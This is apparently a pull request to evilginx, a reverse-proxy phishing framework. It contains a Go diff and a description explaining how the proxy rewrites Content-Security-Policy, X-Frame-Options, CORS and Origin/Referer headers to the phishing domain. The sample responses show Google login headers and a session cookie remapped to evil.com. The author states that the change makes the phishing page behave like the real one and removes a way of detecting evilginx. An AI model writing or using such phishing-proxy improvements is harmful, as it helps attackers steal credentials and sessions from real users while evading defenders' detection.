### PR TITLE
adapt response headers dynamically

### DIFF
--- a/core/http_proxy.go
+++ b/core/http_proxy.go
@@ -52,6 +52,7 @@ const (
 	// borrowed from Modlishka project (https://github.com/drk1wi/Modlishka)
 	MATCH_URL_REGEXP                = `\b(http[s]?:\/\/|\\\\|http[s]:\\x2F\\x2F)(([A-Za-z0-9-]{1,63}\.)?[A-Za-z0-9]+(-[a-z0-9]+)*\.)+(arpa|root|aero|biz|cat|com|coop|edu|gov|info|int|jobs|mil|mobi|museum|name|net|org|pro|tel|travel|ac|ad|ae|af|ag|ai|al|am|an|ao|aq|ar|as|at|au|aw|ax|az|ba|bb|bd|be|bf|bg|bh|bi|bj|bm|bn|bo|br|bs|bt|bv|bw|by|bz|ca|cc|cd|cf|cg|ch|ci|ck|cl|cm|cn|co|cr|cu|cv|cx|cy|cz|dev|de|dj|dk|dm|do|dz|ec|ee|eg|er|es|et|eu|fi|fj|fk|fm|fo|fr|ga|gb|gd|ge|gf|gg|gh|gi|gl|gm|gn|gp|gq|gr|gs|gt|gu|gw|gy|hk|hm|hn|hr|ht|hu|id|ie|il|im|in|io|iq|ir|is|it|je|jm|jo|jp|ke|kg|kh|ki|km|kn|kr|kw|ky|kz|la|lb|lc|li|lk|lr|ls|lt|lu|lv|ly|ma|mc|md|mg|mh|mk|ml|mm|mn|mo|mp|mq|mr|ms|mt|mu|mv|mw|mx|my|mz|na|nc|ne|nf|ng|ni|nl|no|np|nr|nu|nz|om|pa|pe|pf|pg|ph|pk|pl|pm|pn|pr|ps|pt|pw|py|qa|re|ro|ru|rw|sa|sb|sc|sd|se|sg|sh|si|sj|sk|sl|sm|sn|so|sr|st|su|sv|sy|sz|tc|td|tf|tg|th|tj|tk|tl|tm|tn|to|tp|tr|tt|tv|tw|tz|ua|ug|uk|um|us|uy|uz|va|vc|ve|vg|vi|vn|vu|wf|ws|ye|yt|yu|za|zm|zw)|([0-9]{1,3}\.{3}[0-9]{1,3})\b`
 	MATCH_URL_REGEXP_WITHOUT_SCHEME = `\b(([A-Za-z0-9-]{1,63}\.)?[A-Za-z0-9]+(-[a-z0-9]+)*\.)+(arpa|root|aero|biz|cat|com|coop|edu|gov|info|int|jobs|mil|mobi|museum|name|net|org|pro|tel|travel|ac|ad|ae|af|ag|ai|al|am|an|ao|aq|ar|as|at|au|aw|ax|az|ba|bb|bd|be|bf|bg|bh|bi|bj|bm|bn|bo|br|bs|bt|bv|bw|by|bz|ca|cc|cd|cf|cg|ch|ci|ck|cl|cm|cn|co|cr|cu|cv|cx|cy|cz|dev|de|dj|dk|dm|do|dz|ec|ee|eg|er|es|et|eu|fi|fj|fk|fm|fo|fr|ga|gb|gd|ge|gf|gg|gh|gi|gl|gm|gn|gp|gq|gr|gs|gt|gu|gw|gy|hk|hm|hn|hr|ht|hu|id|ie|il|im|in|io|iq|ir|is|it|je|jm|jo|jp|ke|kg|kh|ki|km|kn|kr|kw|ky|kz|la|lb|lc|li|lk|lr|ls|lt|lu|lv|ly|ma|mc|md|mg|mh|mk|ml|mm|mn|mo|mp|mq|mr|ms|mt|mu|mv|mw|mx|my|mz|na|nc|ne|nf|ng|ni|nl|no|np|nr|nu|nz|om|pa|pe|pf|pg|ph|pk|pl|pm|pn|pr|ps|pt|pw|py|qa|re|ro|ru|rw|sa|sb|sc|sd|se|sg|sh|si|sj|sk|sl|sm|sn|so|sr|st|su|sv|sy|sz|tc|td|tf|tg|th|tj|tk|tl|tm|tn|to|tp|tr|tt|tv|tw|tz|ua|ug|uk|um|us|uy|uz|va|vc|ve|vg|vi|vn|vu|wf|ws|ye|yt|yu|za|zm|zw)|([0-9]{1,3}\.{3}[0-9]{1,3})\b`
+	MATCH_HOST_REGEXP               = `\b([a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z0-9][a-z0-9-]{0,61}[a-z0-9]\b`
 )
 
 type HttpProxy struct {
@@ -384,26 +385,11 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 				}
 
 				// fix origin
-				origin := req.Header.Get("Origin")
-				if origin != "" {
-					if o_url, err := url.Parse(origin); err == nil {
-						if r_host, ok := p.replaceHostWithOriginal(o_url.Host); ok {
-							o_url.Host = r_host
-							req.Header.Set("Origin", o_url.String())
-						}
-					}
-				}
+				p.replaceHeaderWithOriginal(req, "Origin")
 
 				// fix referer
-				referer := req.Header.Get("Referer")
-				if referer != "" {
-					if o_url, err := url.Parse(referer); err == nil {
-						if r_host, ok := p.replaceHostWithOriginal(o_url.Host); ok {
-							o_url.Host = r_host
-							req.Header.Set("Referer", o_url.String())
-						}
-					}
-				}
+				p.replaceHeaderWithOriginal(req, "Referer")
+
 				req.Header.Set(string(hg), egg2)
 
 				// patch GET query params with original domains
@@ -605,28 +591,11 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 				}
 			}
 
-			allow_origin := resp.Header.Get("Access-Control-Allow-Origin")
-			if allow_origin != "" && allow_origin != "*" {
-				if u, err := url.Parse(allow_origin); err == nil {
-					if o_host, ok := p.replaceHostWithPhished(u.Host); ok {
-						resp.Header.Set("Access-Control-Allow-Origin", u.Scheme+"://"+o_host)
-					}
-				} else {
-					log.Warning("can't parse URL from 'Access-Control-Allow-Origin' header: %s", allow_origin)
-				}
-				resp.Header.Set("Access-Control-Allow-Credentials", "true")
-			}
-			var rm_headers = []string{
-				"Content-Security-Policy",
-				"Content-Security-Policy-Report-Only",
-				"Strict-Transport-Security",
-				"X-XSS-Protection",
-				"X-Content-Type-Options",
-				"X-Frame-Options",
-			}
-			for _, hdr := range rm_headers {
-				resp.Header.Del(hdr)
-			}
+			// adapt response headers
+			p.replaceHeaderWithPhished(resp, "Access-Control-Allow-Origin")
+			p.replaceHeaderWithPhished(resp, "Content-Security-Policy")
+			p.replaceHeaderWithPhished(resp, "Content-Security-Policy-Report-Only")
+			p.replaceHeaderWithPhished(resp, "X-Frame-Options")
 
 			redirect_set := false
 			if s, ok := p.sessions[ps.SessionId]; ok {
@@ -1020,6 +989,52 @@ func (p *HttpProxy) replaceHtmlParams(body string, lure_url string, params *map[
 	body = strings.Replace(body, "{lure_url_js}", js_url, -1)
 
 	return body
+}
+
+func (p *HttpProxy) replaceHeaderWithOriginal(req *http.Request, header string) {
+	if _, ok := req.Header[header]; ok {
+		// The browser might send the same header more than once
+		Hmap := req.Header.Values(header)
+		for i, H := range Hmap {
+			Hmap[i] = p.replaceStringWithOriginal(H)
+		}
+		req.Header[header] = Hmap
+	}
+}
+
+func (p *HttpProxy) replaceHeaderWithPhished(resp *http.Response, header string) {
+	if _, ok := resp.Header[header]; ok {
+		// The server might send the same header more than once
+		Hmap := resp.Header.Values(header)
+		for i, H := range Hmap {
+			Hmap[i] = p.replaceStringWithPhished(H)
+		}
+		resp.Header[header] = Hmap
+	}
+}
+
+func (p *HttpProxy) replaceStringWithOriginal(str string) string {
+	re_host := regexp.MustCompile(MATCH_HOST_REGEXP)
+
+	str = re_host.ReplaceAllStringFunc(str, func(s_host string) string {
+		if o_host, ok := p.replaceHostWithOriginal(s_host); ok {
+			return o_host
+		}
+		return s_host
+	})
+	return str
+}
+
+func (p *HttpProxy) replaceStringWithPhished(str string) string {
+	re_host := regexp.MustCompile(MATCH_HOST_REGEXP)
+
+	str = re_host.ReplaceAllStringFunc(str, func(s_host string) string {
+		if o_host, ok := p.replaceHostWithPhished(s_host); ok {
+			return o_host
+		}
+		return s_host
+	})
+	return str
 }
 
 func (p *HttpProxy) patchUrls(pl *Phishlet, body []byte, c_type int) []byte {


### PR DESCRIPTION
Hi!

I have been working on handling the response headers.  
Instead of deleting most of them, with this change, evilginx adapts them with the correct phishing domain.

This was tested with Google, who has a complex login page, with several security headers such as `CSP`, `X-Frame-Options`, etc.

All the modifications are done via regexes, so there is no need to parse complex headers such as `CSP`.  
When a domain is found, is translated to its phishing counterpart.  


Here it is an example:
Original response:
```
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-Frame-Options: ALLOW-FROM https://accounts.google.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Sat, 10 Oct 2020 16:44:37 GMT
Content-Security-Policy: script-src 'report-sample' 'nonce-iLylVt6oNF+LG4rH3JT/lg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/AccountsDomainCookiesCheckConnectionHttp/cspreport;worker-src 'self'
Content-Security-Policy: script-src 'nonce-iLylVt6oNF+LG4rH3JT/lg' 'self' 'unsafe-eval' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/AccountsDomainCookiesCheckConnectionHttp/cspreport;frame-ancestors https://accounts.google.com
Cross-Origin-Resource-Policy: cross-origin
Server: ESF
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Alt-Svc: h3-Q050=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-27=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-T050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
Connection: close
Content-Length: 31689
```

Modified response:
```
HTTP/1.1 200 OK
Alt-Svc: h3-Q050=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-27=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-T050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Connection: close
Content-Security-Policy: script-src 'report-sample' 'nonce-iLylVt6oNF+LG4rH3JT/lg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/AccountsDomainCookiesCheckConnectionHttp/cspreport;worker-src 'self'
Content-Security-Policy: script-src 'nonce-iLylVt6oNF+LG4rH3JT/lg' 'self' 'unsafe-eval' https://apis.evil.com https://ssl.evil.com https://wwww.evil.com https://ssl-gstatic.evil.com https://www.google-analytics.com;report-uri /_/AccountsDomainCookiesCheckConnectionHttp/cspreport;frame-ancestors https://accounts.evil.com
Content-Type: text/html; charset=utf-8
Cross-Origin-Resource-Policy: cross-origin
Date: Sat, 10 Oct 2020 16:44:37 GMT
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Server: ESF
X-Content-Type-Options: nosniff
X-Frame-Options: ALLOW-FROM https://accounts.evil.com
X-Xss-Protection: 0
Content-Length: 31710
```
Here, `X-Frame-Options` and `CSP` (note that this header is sent twice, this is handled properly) where adapted.

Here is another example:
Original response:
```
HTTP/1.1 200 OK
Access-Control-Allow-Origin: https://accounts.google.com
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: X-Playlog-Web
P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
Content-Type: text/plain; charset=UTF-8
Date: Sat, 10 Oct 2020 16:44:37 GMT
Server: Playlog
Cache-Control: private
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Set-Cookie: NID=204=e5d-CXzZLEddorXJefHKpa6Pc2zEbqZz0BJz6eLj96LitV-mHt8-Epr4lmujEFTp9nXwQdunlIsjuMqX8G8EfQdcuAoDEIKkUJ6h-lRTBAJG5hG-ktTHO4zvag0uGjMyNz5jgxHY1vAjhmPvQTdV2kxC-g-JHVRRmmgfEHhOfnI; expires=Sun, 11-Apr-2021 16:44:37 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
Alt-Svc: h3-Q050=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-27=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-T050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
Expires: Sat, 10 Oct 2020 16:44:37 GMT
Connection: close
Content-Length: 131
```
Modified response:
```
HTTP/1.1 200 OK
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: X-Playlog-Web
Access-Control-Allow-Origin: https://accounts.evil.com
Alt-Svc: h3-Q050=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-27=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-T050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
Cache-Control: private
Connection: close
Content-Type: text/plain; charset=UTF-8
Date: Sat, 10 Oct 2020 16:44:37 GMT
Expires: Sat, 10 Oct 2020 16:44:37 GMT
P3p: CP="This is not a P3P policy! See g.co/p3phelp for more info."
Server: Playlog
Set-Cookie: NID=204=e5d-CXzZLEddorXJefHKpa6Pc2zEbqZz0BJz6eLj96LitV-mHt8-Epr4lmujEFTp9nXwQdunlIsjuMqX8G8EfQdcuAoDEIKkUJ6h-lRTBAJG5hG-ktTHO4zvag0uGjMyNz5jgxHY1vAjhmPvQTdV2kxC-g-JHVRRmmgfEHhOfnI; Path=/; Domain=evil.com; Expires=Sun, 11 Apr 2021 16:44:37 GMT; HttpOnly; Secure; SameSite=None
X-Frame-Options: SAMEORIGIN
X-Xss-Protection: 0
Content-Length: 131
```
Here, `Access-Control-Allow-Origin` was adapted (meaning, this also adapts CORS policies correctly).

The request headers `Origin` and `Referer` are also handled this way for consistency.

With this change, the page will behave the same way in the real page and in the phishing page.  
For example, If a particular script in the page doesn't execute due to the `CSP` policy, it won't execute in the phishing page neither (right now, this can be used for detecting evilginx).  
You will even see the same warnings in the developer console.  

Btw, this doesn't break the js inject functionality.  


Hope you will consider it.
